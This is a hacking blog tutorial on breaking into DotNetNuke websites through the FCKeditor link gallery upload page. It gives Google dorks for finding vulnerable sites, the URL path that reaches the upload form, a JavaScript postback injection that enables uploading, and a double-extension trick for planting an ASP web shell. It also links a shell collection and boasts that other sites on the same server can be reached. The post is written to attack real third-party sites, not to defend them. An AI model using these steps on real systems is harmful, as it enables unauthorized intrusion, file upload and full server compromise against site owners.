Hello everyone!! Previously we have discussed about "
How to Hack Website Using Havij". Today,I am going to tell about one more very usefull but old method which you can used to hack website using Dot net nuke(DNN) exploit. I know some of you know about this method DNN but it is very good exploit to hack dot net sites. By using this DNN exploit, you can even hack all sites which are hosted on same server. Also you can upload any file using it. It is easy method as compared to other hacking attacks such as SQL-Injection and Cross Site Scripting etc.
For the JavaScript applets to Work I would recommend you guys to use Firefox 3.0Download Firefox V. 3.0What is DNN (Dot Net Nuke) ?DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.
Step 1: First go to google.com search page and use this following dork to find vulnerable site.
- Code:
-
inurl:home/tabid/36/language/en-US/Default.aspx
inurl:fcklinkgallery.aspx
inurl:/portals/0
Step 2: Open any of the Sites from the search and it should look like the one below:
- Code:
-
http://www.someinsecuresite.com/home/tabid/36/language/en-US/Default.aspx
Now replace:
- Code:
-
home/tabid/36/language/en-US/Default.aspx
with
- Code:
-
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
So your URL becomes:
http://www.someinsecuresite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspxNow Most probably assuming you get an Image like the one below, your site is vulnerable
Now select
File: A file On your site as shown below:
Step 3: Now after selecting the option, we need to use a javascript code. Before using javascript, first we need to choose file location as root, after that clear everything written on browser url and paste the below javascript only.
- Code:
-
javascript:__doPostBack('ctlURL$cmdUpload','')
After above javascript Injection is complete, you can see something like the image below:
Step 4: Now all you need to so is upload your shell.
Note: But remember you cant upload your shell directly in .php format and not even you can do anything by uploading .php.jpgSo for this purpose first we need to upload a special type of shell which is specially coded in asp.
You Can Download the collection of shells that i use.
Download Shells Now here's part where you rename your shell to
shell.php;.jpgAfter upload complete you can view your shell by visiting the link:
http://www.someinsecuresite.com/portals/0/yourshell.asp;.jpg
Now that you have the shell uploaded, you can do whatever you like ..